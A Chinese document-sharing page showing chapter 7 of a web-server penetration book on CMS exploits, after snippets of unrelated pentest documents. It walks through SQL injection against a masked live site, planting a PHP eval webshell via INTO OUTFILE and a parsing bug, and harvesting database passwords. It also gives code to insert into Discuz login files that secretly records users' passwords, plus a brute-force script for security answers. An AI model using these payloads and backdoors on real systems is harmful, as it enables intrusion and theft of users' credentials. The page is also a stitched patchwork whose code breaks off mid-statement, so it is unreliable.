当前位置:文档之家 › Web服务器渗透实战 第7章

Web服务器渗透实战 第7章

  • 格式:ppt
  • 大小:5.07 MB
  • 文档页数:98

下载文档原格式

  / 98

合集下载

web渗透测试方案

web渗透测试方案

web渗透测试方案背景介绍:随着互联网技术的快速发展,越来越多的应用和服务被部署在Web 平台上。

然而,随之而来的安全威胁也不断增加。

为了保护网站和Web应用的安全,进行Web渗透测试变得越来越重要。

下面将提供一份高效的Web渗透测试方案,以确保系统的安全性和可靠性。

1. 项目背景本项目旨在为客户提供全面的Web渗透测试,以发现可能存在的安全风险和漏洞,并提供相应的修复建议。

渗透测试的目标是评估Web 应用的安全性,发现潜在的威胁和弱点,并提供相应的解决方案,以确保系统的安全性。

2. 测试目标本次渗透测试的目标是评估客户的Web应用程序,包括前端和后端功能,以及与数据库和服务器的交互。

主要测试内容包括但不限于以下几个方面:2.1 网站信息搜集通过通过搜索引擎、社交媒体及其他公开渠道收集关于目标网站的信息,包括服务器信息、敏感文件和目录等。

2.2 漏洞扫描和评估利用自动化工具对目标网站进行漏洞扫描,包括但不限于SQL注入、XSS攻击、文件上传漏洞等。

对扫描结果进行评估,确定漏洞的危害程度和可能的影响范围。

2.3 验证和认证测试测试目标网站的登录和认证机制,检查是否存在弱密码、密码重置漏洞以及会话管理等安全问题。

测试通过各种方式进行身份验证的功能,如OAuth、验证码等,以确定其安全性。

2.4 授权和访问控制测试测试目标网站的访问控制机制,检查是否存在授权问题和未经授权访问的路径。

确保未经授权用户无法访问敏感数据和功能。

2.5 安全配置评估评估目标网站的安全配置,包括但不限于Web服务器、数据库、操作系统的安全设置,以及是否存在默认或弱密码等问题。

2.6 数据库安全测试测试目标数据库的安全性,包括但不限于SQL注入漏洞、数据泄露等问题。

确保数据库配置合理,并限制对数据库的非授权访问。

3. 测试方法和工具为了保证测试的有效性和全面性,我们将采用多种测试方法和工具,包括但不限于以下几个方面:3.1 手工测试利用自主开发的测试工具和手工技术,对目标网站进行深入评估和测试。

web渗透基础知识

web渗透基础知识

web渗透基础知识摘要:1.什么是Web 渗透2.Web 渗透的目的是什么3.Web 渗透的分类4.Web 渗透的基本流程5.Web 渗透的防御策略正文:Web 渗透是指攻击者利用Web 应用程序的安全漏洞,获取未授权的访问权限或窃取敏感数据的过程。

Web 渗透的目的是获得对Web 应用程序的非法控制权,以实现攻击者的恶意目的。

Web 渗透可以分为两种类型:一种是外部攻击,攻击者从外部发起攻击,试图进入Web 应用程序;另一种是内部攻击,攻击者已经获得了Web 应用程序的合法访问权限,但试图超越其权限范围。

Web 渗透的基本流程包括以下步骤:第一步:信息收集。

攻击者通过各种手段收集Web 应用程序的信息,包括IP 地址、域名、操作系统、Web 服务器和应用程序版本等。

第二步:漏洞扫描。

攻击者使用自动化工具扫描Web 应用程序,以发现潜在的安全漏洞。

这些漏洞可能包括SQL 注入、跨站脚本、文件包含等。

第三步:漏洞利用。

攻击者利用已知的漏洞或开发新的漏洞利用程序,以获得对Web 应用程序的非法访问权限。

第四步:权限提升。

攻击者试图获取更高的权限,以便更深入地控制系统。

第五步:数据窃取。

攻击者窃取敏感数据,如用户信息、密码、信用卡信息等。

为了防止Web 渗透,可以采取以下防御策略:1.保持软件更新。

及时更新Web 应用程序和相关的软件包,以修复已知的安全漏洞。

2.使用安全编码实践。

在开发Web 应用程序时,遵循安全编码实践,以减少潜在的安全漏洞。

3.实施访问控制。

对Web 应用程序的访问应该进行严格的控制,只允许授权的用户访问。

4.使用安全扫描工具。

使用安全扫描工具定期扫描Web 应用程序,以发现潜在的安全漏洞。

5.建立紧急响应计划。

网络安全之web渗透测试实战

网络安全之web渗透测试实战

网络安全之web渗透测试实战随着互联网的发展和普及,在线交流、电子商务和云计算等领域得到了广泛应用。

然而,随之而来的是网络安全威胁的增加,不法分子利用网络漏洞进行非法活动的现象时有发生。

为了保护网络安全,Web渗透测试实战成为了解决网络安全问题的一种重要手段。

本文将介绍Web渗透测试的定义及实施步骤,并通过相关案例探讨其实战策略。

一、Web渗透测试的定义Web渗透测试是指模拟黑客攻击手段,对Web应用系统中可能存在的漏洞进行测试和评估的过程,以便发现和修复潜在的安全问题。

它的主要目的是通过模拟攻击来识别和量化Web应用程序中的安全弱点,以确保系统的安全性。

二、Web渗透测试实施步骤1. 信息收集:通过网络搜索、端口扫描等手段,获取目标Web应用程序的相关信息,包括IP地址、域名、服务器类型等。

2. 漏洞扫描:利用专业的渗透测试工具,如Nessus、Metasploit等,对目标系统进行全面扫描,检测可能存在的漏洞和安全威胁。

3. 漏洞利用:根据扫描结果,选择合适的漏洞进行攻击,获取系统权限,并获取敏感信息或者进一步深入渗透。

4. 提权与保持访问:如果成功获取系统权限,攻击者将利用提权技术和后门等手段,保持对目标系统的持续访问和控制权。

5. 数据挖掘与后期分析:在攻击过程中,攻击者将尽可能地获取敏感数据,并进行后期分析,以寻找更多的攻击目标或者建立攻击报告。

三、Web渗透测试实战策略1. 选择合适的渗透测试工具:根据实际需求,选择适合的渗透测试工具。

常用的工具有Burp Suite、OWASP ZAP等,它们可以帮助完成基本的信息收集、漏洞扫描和漏洞利用等任务。

2. 模拟真实攻击场景:在进行渗透测试时,应该尽量模拟真实的攻击场景,例如模拟黑客通过发送恶意代码或者利用社交工程等方式获取系统权限。

3. 注意法律和道德约束:渗透测试是一项专业工作,需要严格遵守法律和道德规范。

在进行测试前,应征得相关授权,并与被测试系统的所有者达成一致。

web渗透测试基础入门PPT模板

web渗透测试基础入门PPT模板
web渗透测试基础入门
演讲人
2 0 2 x - 11 - 11
0
1
第1章渗透测试基础入门课程
第1章渗透 测试基础入 门课程
1-1struts2漏洞和 phpmyadmin批量拿 she
01
1-3渗透测试基本介绍1. 漏洞的价值2.src和众测 是什么?3.学习课程的目 标4.安全工作开展涉及内 容5.课程适用人群6.课程 需要具备的技能7.安全相 关基础知识
第1章渗透测试基础入门课程
1. 1-7总结与后续学习方法 2. 1-8任务二:web架构图与黑客gj的行为阶段顺序图 3. 1-9实战任务二实战任务二 4. 1-10任务三:web漏洞与扫描工具汇总 5. 1-11网络安全高阶实战课程任务三网络安全高阶实战课程任务三 6. 1-8任务二:WEB架构图与黑客GJ的行为阶段顺序图 7. 1-9实战任务二实战任务二 8. 1-10任务三:WEB漏洞与扫描工具汇总
1-5实战分析目标与web 漏洞基本讲解和相关概念 1.漏洞安全相关的概念2. 实战分析一个目标 3.web相关漏洞介绍
03
05
020406 Nhomakorabea1-2什么是黑客和渗透测 试
1-4白帽子渗透测试时的 思路行为阶段与web架 构1.渗透测试思维导图2. 渗透测试行为阶段3.大型 web的架构
1-6web应用程序技术分 析整个数据包
感谢聆听

web渗透 教材

web渗透 教材

web渗透教材
1. 《Web 安全渗透测试实战指南》(第二版):作者是徐焱、王磊等,书中详细介绍了Web 安全渗透测试的各个方面,包括信息收集、漏洞分析、攻击利用等,涵盖了大量的实际案例和工具使用方法。

2. 《SQL 注入攻击与防御(第二版)》:作者是吴世雄、马均飞等,主要针对SQL 注入这种常见的Web 安全漏洞,深入探讨了攻击技术和防御方法,提供了丰富的实践指导。

3. 《Metasploit 渗透测试指南》:作者是David Kennedy 等,Metasploit 是一款流行的渗透测试框架,本书详细介绍了如何使用Metasploit 进行漏洞利用和攻击,适合有一定基础的读者。

4. 《Kali Linux 渗透测试的艺术》:作者是Offensive Security 团队,Kali Linux 是一个常用的渗透测试操作系统,本书介绍了如何使用Kali Linux 进行各种渗透测试任务。

5. 《白帽子讲Web 安全》:作者是吴翰清,以通俗易懂的方式讲解了Web 安全的基本概念、常见漏洞及防御方法,适合初学者入门。

学习使用BurpSuite进行Web应用安全测试

学习使用BurpSuite进行Web应用安全测试

学习使用BurpSuite进行Web应用安全测试第一章:BurpSuite简介BurpSuite是一款功能强大的集成式渗透测试工具,广泛应用于Web应用程序漏洞扫描和安全评估。

它由PortSwigger开发,为渗透测试人员提供了一整套工具和功能,帮助他们发现、利用和修复Web应用程序中的漏洞。

BurpSuite的核心功能包括代理服务器、漏洞扫描器、爬虫和拦截器等。

第二章:安装和配置BurpSuite在使用BurpSuite之前,首先需要进行安装和配置。

BurpSuite支持多个操作系统,包括Windows、Linux和MacOS。

根据自己的系统选择下载对应的安装包,并按照步骤进行安装。

安装完成后,打开BurpSuite,进入配置界面。

配置界面包括代理、目标、Spider和Scanner等选项,根据需要进行相应的设置。

第三章:使用BurpSuite代理BurpSuite的代理功能是其最重要的部分之一,可以通过拦截和修改HTTP通信来分析和调试Web应用程序。

在使用代理之前,需要将浏览器的代理设置为BurpSuite的监听地址和端口。

然后打开BurpSuite的代理界面,点击“Start”按钮启动代理服务器。

此时,所有浏览器发出的HTTP请求都会被BurpSuite代理拦截并显示在代理历史中。

通过代理历史,可以查看请求和响应的详细信息,包括参数、报文头和Cookie等。

第四章:使用BurpSuite爬虫BurpSuite的爬虫功能可以模拟浏览器访问网站,并自动发现链接和目录。

在爬虫界面中,可以设置起始URL和最大爬取深度等参数。

点击“Start”按钮,BurpSuite会自动开始爬取网站,并将发现的链接保存在Site Map中。

通过查看Site Map,可以得到网站的结构以及存在的漏洞点。

此外,爬虫还可以自动提交表单、检测反爬机制和识别Session等。

第五章:使用BurpSuite漏洞扫描器BurpSuite的漏洞扫描器是一种自动化工具,用于检测常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击和任意文件上传等。

web渗透技术及实战案例解析

web渗透技术及实战案例解析Web渗透技术及实战案例解析。

Web渗透技术是指通过对Web应用程序进行安全漏洞检测和利用,来获取未授权的访问权限或者获取敏感信息的一种攻击技术。

在当今信息化时代,网站安全问题备受关注,因此掌握Web渗透技术对于信息安全人员至关重要。

本文将对Web渗透技术进行深入探讨,并结合实战案例进行解析。

首先,我们需要了解Web渗透技术的一些基本概念。

Web渗透技术主要包括SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、文件上传漏洞等多种攻击手段。

其中,SQL注入是指攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而篡改数据库的查询逻辑,获取敏感信息或者对数据库进行破坏。

XSS跨站脚本攻击则是指攻击者通过在Web页面中嵌入恶意脚本代码,来窃取用户的信息或者篡改页面内容。

CSRF跨站请求伪造是指攻击者利用用户在已登录的情况下,通过伪造请求来执行一些操作,比如发起转账、修改密码等。

文件上传漏洞则是指攻击者通过上传恶意文件来获取服务器的控制权限。

掌握这些基本概念是进行Web渗透技术实战的基础。

接下来,我们将结合实战案例对Web渗透技术进行进一步解析。

以SQL注入为例,当攻击者在Web应用程序的搜索框中输入恶意的SQL代码时,如果程序没有对输入进行过滤和验证,就会导致数据库查询逻辑被篡改,从而获取敏感信息。

在实际渗透测试中,我们可以通过手工注入和工具辅助注入两种方式来进行测试,从而找到漏洞并及时修复。

对于XSS跨站脚本攻击,攻击者可以通过在网页中插入恶意脚本代码,来获取用户的Cookie信息或者进行页面篡改。

在渗透测试中,我们可以通过输入一些特殊字符来测试网站的过滤和验证机制,从而找到XSS漏洞并进行修复。

对于CSRF跨站请求伪造和文件上传漏洞,我们也可以通过实际案例进行深入分析和解析,以便更好地理解和掌握这些攻击技术。

综上所述,Web渗透技术是信息安全领域中的重要内容,掌握这些技术对于保护网站安全至关重要。

《Web安全攻防:渗透测试实战指南》笔记

《Web安全攻防:渗透测试实战指南》阅读记录目录一、基础篇 (3)1.1 Web安全概述 (4)1.1.1 Web安全定义 (5)1.1.2 Web安全重要性 (6)1.2 渗透测试概述 (6)1.2.1 渗透测试定义 (8)1.2.2 渗透测试目的 (9)1.2.3 渗透测试流程 (9)二、技术篇 (11)2.1 Web应用安全检测 (12)2.1.1 SQL注入攻击 (14)2.1.2 跨站脚本攻击 (16)2.1.3 文件上传漏洞 (17)2.2 操作系统安全检测 (19)2.2.1 操作系统版本漏洞 (19)2.2.2 操作系统权限设置 (20)2.3 网络安全检测 (21)2.3.1 网络端口扫描 (23)2.3.2 网络服务识别 (24)三、工具篇 (25)3.1 渗透测试工具介绍 (27)3.2 工具使用方法与技巧 (28)3.2.1 Kali Linux安装与配置 (31)3.2.2 Metasploit使用入门 (31)3.2.3 Wireshark使用技巧 (33)四、实战篇 (34)4.1 企业网站渗透测试案例 (36)4.1.1 漏洞发现与利用 (37)4.1.2 后门植入与维持 (39)4.1.3 权限提升与横向移动 (40)4.2 网站安全加固建议 (41)4.2.1 参数化查询或存储过程限制 (42)4.2.2 错误信息处理 (44)4.2.3 输入验证与过滤 (45)五、法规与政策篇 (46)5.1 国家网络安全法规 (47)5.1.1 《中华人民共和国网络安全法》 (48)5.1.2 相关法规解读 (49)5.2 企业安全政策与规范 (50)5.2.1 企业信息安全政策 (52)5.2.2 安全操作规程 (53)六、结语 (54)6.1 学习总结 (55)6.2 深入学习建议 (57)一、基础篇在深入探讨Web安全攻防之前,我们需要了解一些基础知识。

Web 安全是指保护Web应用程序免受未经授权访问、篡改或泄露的过程。

burpsuite实战指南


FireFox设置
与IE的设置类似,在FireFox中,我们也要进行一些参数设置,才能将FireFox浏览器的通信流 量,通过Burp Suite代理进行传输。详细的步骤如下: 1. 启动FireFox浏览器,点击【工具】菜单,点击【选项】。
2. 在新打开的about:preferences#advanced窗口中,依次点击【高级】-【网络】,我们将 会看到FireFox连接网络的设置选项。
更多关于JVM性能调优的知识请阅读 Oracle JVM Tuning
IPv6问题调试
Burp Suite是不支持IPv6地址进行数据通信的,这时在cmd控制台里就会抛出如下异常
.SocketException: Permission denied
同时,浏览器访问时,也会出现异常
Burp proxy error: Permission denied: connect
5
第一章 Burp Suite 安装和环境配置
6
第二章 Burp Suite代理和浏览器设置
第二章 Burp Suite代理和浏览器设置
Burp Suite代理工具是以拦截代理的方式,拦截所有通过代理的网络流量,如客户端的请求数 据、服务器端的返回信息等。Burp Suite主要拦截http和https协议的流量,通过拦截,Burp Suite以中间人的方式,可以对客户端请求数据、服务端返回做各种处理,以达到安全评估测 试的目的。 在日常工作中,我们最常用的web客户端就是的web浏览器,我们可以通过代理的设置,做到 对web浏览器的流量拦截,并对经过Burp Suite代理的流量数据进行处理。 下面我们就分别看看IE、Firefox、Google Chrome下是如何配置Burp Suite代理的。

实战网络安全 pdf

实战网络安全 pdf实战网络安全是一本网络安全领域的经典书籍,主要介绍了实际网络安全防护和攻击技术。

全书共分为13章,包括了针对各种攻击的防护策略和实操技巧。

第1章介绍了网络安全的基本概念和网络威胁。

主要包括网络安全的定义、威胁的分类以及网络攻击者的动机等方面。

第2章讲述了网络摄像头的漏洞和攻击方式。

通过具体案例分析,展示了网络摄像头的安全隐患并提供了相应的防护措施。

第3章介绍了常见的网络钓鱼攻击和防范方法。

包括钓鱼网站的特征、识别钓鱼邮件的技巧以及安全意识培训的重要性等。

第4章讨论了移动设备安全问题,如智能手机、平板电脑等。

包括设备丢失或被盗、应用漏洞以及移动操作系统的安全性等方面的内容。

第5章介绍了网络入侵检测与防御技术。

包括入侵检测系统(IDS)的原理和分类、入侵检测规则的编写以及实际应用案例分析。

第6章讨论了远程访问服务器的安全问题。

包括SSH远程登录的安全配置、防止暴力破解密码的方法以及配置防火墙规则等方面的内容。

第7章介绍了网络蜜罐的概念和应用。

讲述了网络蜜罐的原理和分类,以及利用蜜罐吸引并追踪攻击者的技术。

第8章讨论了DDoS攻击与防御。

介绍了分布式拒绝服务(DDoS)攻击的原理和类型,以及应对DDoS攻击的防御策略。

第9章介绍了内网渗透测试的方法和技巧。

主要包括内网渗透测试的准备工作、常见的内网攻击技术以及防御内网攻击的方法。

第10章讨论了无线网络的安全问题。

包括无线网络的基本原理、常见的无线安全隐患以及保护无线网络的方法和技巧等内容。

第11章介绍了Web应用程序的安全漏洞和攻击技术。

包括SQL注入、跨站脚本攻击、文件上传漏洞等常见的Web安全问题,并提供了相应的防护方法。

第12章讨论了云安全的概念和技术。

介绍了云计算架构的安全性、云存储的安全性以及云安全的最佳实践等方面的内容。

第13章总结了网络安全的未来发展方向和趋势。

展望了人工智能在网络安全领域的应用、物联网安全的挑战以及区块链技术在网络安全中的应用等等。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

第七章 CMS常见漏洞及利用
2. 查看服务信息 通过查看服务器信息, 发现服务器其开启了Fastcgi, 系统架构为Windows Server 2008 + IIS7 + PHP,该服务 器可能存在解析漏洞,通过 admin个人资料上传一句话 后门图片文件,然后访问地 址: http://www.********.com/up load_files/icon/1.jpg/1.php。 网页显示正常,通过中国菜 刀一句话后门成功获取 Webshell,如图7-10所示。TP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) {
第七章 CMS常见漏洞及利用
第七章 CMS常见漏洞及利用
第一节 由视频系统SQL注入到服务器权限 第二节 Discuz! 论坛密码记录以及安全验证问题暴力破解 第三节 利用PHPcms后台漏洞渗透某网站 第四节 杰瑞CMS后台管理员权限获取Webshell 第五节 TinyShop缓存文件获取 Webshell 0day分析 第六节 基于ThinkPHP的2个CMS后台getshell利用 第七节 DedeCMS系统渗透思路及漏洞利用 第八节 Shopex4.85后台获取Webshell
5. 获取管理员密码 通过破解0e8c338ca961a1da946cc6a2802fc1ee获取管理员admin的密码 “xdjzh”,使用该密码进行后台登录,并查看服务器信息,在浏览器中打开地址 http://www.********.com/admin/index.php?lfj = center&job = phpinfo,如图7-8所示,成功获 取网站的真实路径地址:D:/phpweb/video。
第七章 CMS常见漏洞及利用
2. 猜测会员账号密码 对会员账号aaaaaa进行密码猜测,其密码为aaaaaa,使用该密码进行登录,并在后台寻 找专题,添加一个专题。获取其专题地址:http://www.********.com/video/showsp.php?fid = 1&id = 12。 3. 获取管理员密码 构造SQL注入地址获取管理员密码,执行效果如图7-6所示。
第七章 CMS常见漏洞及利用
7.1.3 针对CMS系统寻找漏洞 通过扫描未能发现高危或者可供利用的漏洞,因此只能根据经验利用手动方式来寻找 漏洞。如图7-4所示,在目标网站底部发现有“Powered by qibosoft V1.0 Code © 2003-10 qibosoft”信息,可以确认该网站采用的是齐博的CMS,结合网站内容,可以判断为齐博视 频CMS系统,从互联网上去下载了一套齐博视频CMS系统到本地进行分析。
第七章 CMS常见漏洞及利用
7.1.5 获取Webshell 1. 执行SQL查询导出一句话后门 单击“系统功能”→“数据库工具”→“运行SQL语句代码”,在查询语句中执行以下 代码: select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/video/stttt.php' 执行后,访问网站,网站提示不存在该文件,后续执行以下代码: select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/video/upload_files/s.php' select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/upload_files/icons/s.php' 执行后显示语句执行成功,如图7-9所示,但访问对应的地址均显示错误,无法获取 Webshell,判断可能是存在杀毒软件或者无写入权限。
第七章 CMS常见漏洞及利用
2. Discuz!X2.5-3.1 在Discuz!X2.5-3.1安装目录下的uc_client文件夹中找到client.php文件,在函数 “unction uc_user_login”中加入以下代码: //以下为密码记录程序代码 if(getenv('HTTP_CLIENT_IP')) {
echo "error:打开字典文件错误"; die;} while($buf = fgets($fd)){ for($i=1; $i<8; $i++) {
$tmp = substr(md5(trim($buf).md5($i)),16,8); $conn = strcmp($tmp,$argv[1]);
第七章 CMS常见漏洞及利用
4. 使用right函数获取剩余密码字段 虽然第一次获取了admin的密码“0e8c338ca961a1da946cc6a28”,但该密码位数不对, 获取密码位数为25,而真实密码使用的是md5加密,位数是32位,通过right(password,15)来 获取剩余的密码串,如图7-7所示,成功获取剩余字符串。
第七章 CMS常见漏洞及利用
7.2.3 Discuz!X2.5密码安全问题暴力破解 程序代码如下: <? /*discuz提示问题答案暴力破解程序。*/
第七章 CMS常见漏洞及利用
error_reporting(0); if($argc<2){ print_r(' -------------------------Usage: php cracksecques.php hash Example: php cracksecques.php ca9e47ea -------------------------'); die;} $fd = fopen("pass.dic",r); if(!$fd){
2. 反查域名 在/tools/web-sites-on-web-server/中对该IP地址进行域名反查, 如图7-2所示,获取该IP地址下有6个域名。
第七章 CMS常见漏洞及利用
7.1.2 扫描网站 使用Acunetix Web Vulnerability Scanner进行漏洞扫描,如图7-3所示。
第七章 CMS常见漏洞及利用
7.1.6 获取系统权限 1. 获取3389端口信息 2. 获取数据库密码 通过Webshell查看数据库配置文件D:/phpweb/video/data/mysql_config.php,该文件中定 义了主机、用户、密码及参数值。获取其MySQL密码为123456,同时还获取内网服务器 192.168.0.218的数据库密码信息,如图7-11所示。
第七章 CMS常见漏洞及利用
第一节 由视频系统SQL注入到服务器权限
第七章 CMS常见漏洞及利用
7.1.1 信息收集 1. 扫描端口 使用Zenmap对124.***.***.***进行全端口扫描,其扫描结果显示主机关闭,判断服务 器端应该有安全防护,使用“Intense scan,no ping”扫描方式,如图7-1所示。
第七章 CMS常见漏洞及利用
第二节 Discuz!论坛密码记录以及安全 验证问题暴力破解
第七章 CMS常见漏洞及利用
7.2.1 Discuz!论坛密码记录程序以及实现 1. Discuz!7.1-7.2论坛记录程序以及实现 在Discuz!7.2论坛中找到程序文件login.func.php,在其中加入以下代码: $ip = $_SERVER['REMOTE_ADDR']; $showtime = date("Y-m-d H:i:s"); $record = "<?exit();?>".$username." --------".$password." IP:".$ip."questionid".$questionid."answer". $answer." Time:".$showtime."\r\n"; $handle = fopen('./include/csslog.php','a+'); $write = fwrite($handle,$record); 密码记录和登录文件保存在include目录下的cssog.php文件中,打开csslog.php即可看到 获取的用户记录文件,如图7-13所示。
第七章 CMS常见漏洞及利用
2.密码问题设置和解除 密码登录安全提问是在用户注册成功后,通过再次设置“密码安全”来实现的,如图718所示,Discuz!默认设置了7个安全提问,用户只需要选择问题,然后设置问题的答案即 可,论坛最高管理员或者创始人可以直接将安全提问清除。设置以后用户登录时除了需要 输入用户名和密码外,还需要选择安全问题并输入问题答案,如图7-19所示。
7.1.4 取得突破 1. 获取注册会员信息 分别访问http://www.********.com/member/homepage.php?uid = 2和 http:// www.********. com/ member/homepage.php?uid = 1获取当前系统注册账号admin和 aaaaaa。如图7-5所示。
$onlineip = getenv('REMOTE_ADDR'); } else {
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR']; } if(getenv('HTTP_CLIENT_IP')) {